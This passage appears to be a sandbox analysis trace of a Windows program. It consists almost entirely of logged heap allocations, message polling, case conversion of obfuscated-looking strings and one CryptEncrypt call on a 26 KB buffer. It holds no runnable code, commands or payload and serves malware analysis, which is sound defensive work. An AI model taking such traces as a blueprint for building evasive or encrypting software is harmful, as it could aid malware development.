(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.783] CharLowerBuffW (in: lpsz="byte[26608]", cchLength=0xb | out: lpsz="byte[26608]") returned 0xb [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.784] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.784] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.785] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.785] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.785] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.785] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24c4a38*, pdwDataLen=0x8bef68*=0x67e9, dwBufLen=0x67f0 | out: pbData=0x24c4a38*, pdwDataLen=0x8bef68*=0x67f0) returned 1 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0262.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.788] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.788] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.788] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.788] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.788] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.788] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.788] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.789] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.789] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.789] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.789] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.789] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.789] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.789] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.790] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.790] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.790] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.790] RtlAllocateHeap 